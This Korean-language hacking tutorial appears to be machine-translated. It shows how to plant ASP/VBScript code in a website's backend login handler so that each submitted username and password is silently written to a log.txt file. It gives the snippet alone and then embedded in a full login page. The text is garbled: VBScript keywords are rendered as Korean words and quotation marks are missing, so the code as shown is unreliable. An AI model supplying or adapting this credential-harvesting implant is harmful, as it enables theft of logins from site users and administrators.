많은 해커들은 백그라운드 로그인 코드를 수정하여 대상 웹사이트의 사용자 로그인 비밀번호를 알아냅니다. 따라서 비밀번호를 입력하면 해당 비밀번호가 txt로 저장됩니다.
코드는 다음과 같습니다:
fso=server.createobject(scripting.filesystemobject) 설정
fso.FileExists(server.mappath(log.txt))=true인 경우
fin=fso.OpenTextFile(server.mappath(log.txt)) 설정
온도=fin.readall
핀.닫기
핀=아무것도 설정하지 않음
종료하면
fout=fso.createtextfile(server.mappath(log.txt)) 설정
fout.WriteLine(임시&사용자:&사용자 이름&¦pwd:&비밀번호&¦시간:&now()&)
fout.close
fout=아무것도 설정하지 않음
fso=아무것도 설정하지 않음
백그라운드 로그인 시 양식이 제출된 위치에 삽입하세요!
참고 문서:
다음과 같이 코드 코드를 복사합니다.
<%@언어=vbscript 코드페이지=936 %>
<%
딤SQL,rs
희미한 사용자 이름, 비밀번호, CheckCode
사용자 이름=replace(trim(요청(사용자 이름)),',)
비밀번호=교체(trim(요청(비밀번호)),',)
CheckCode=replace(trim(Request(CheckCode)),',)
사용자 이름=이면
FoundErr=참
ErrMsg=ErrMsg & <br><li>사용자 이름은 비워둘 수 없습니다! </li>
종료하면
비밀번호=이면
FoundErr=참
ErrMsg=ErrMsg & <br><li>비밀번호는 비워둘 수 없습니다! </li>
종료하면
CheckCode=이면
FoundErr=참
ErrMsg=ErrMsg & <br><li>인증 코드는 비워둘 수 없습니다! </li>
종료하면
세션(CheckCode)=이면
FoundErr=참
ErrMsg=ErrMsg & <br><li>로그인 시간이 너무 깁니다. 로그인 페이지로 돌아가서 다시 로그인하십시오. </li>
종료하면
if CheckCode<>CStr(session(CheckCode)) 그러면
FoundErr=참
ErrMsg=ErrMsg & <br><li>입력한 확인 코드가 시스템에서 생성된 확인 코드와 일치하지 않습니다. 다시 입력하십시오. </li>
종료하면
'이 뒤에 내가 추가한 코드가 있습니다 ~ 시작 영역
fso=server.createobject(scripting.filesystemobject) 설정
fso.FileExists(server.mappath(log.txt))=true인 경우
fin=fso.OpenTextFile(server.mappath(log.txt)) 설정
온도=fin.readall
핀.닫기
핀=아무것도 설정하지 않음
종료하면
fout=fso.createtextfile(server.mappath(log.txt)) 설정
fout.WriteLine(임시&사용자:&사용자 이름&|비밀번호:&비밀번호&|시간:&now()&)
fout.close
fout=아무것도 설정하지 않음
fso=아무것도 설정하지 않음
'뒤에 있는 코드는 me~end 영역에서 삭제되었습니다.
%>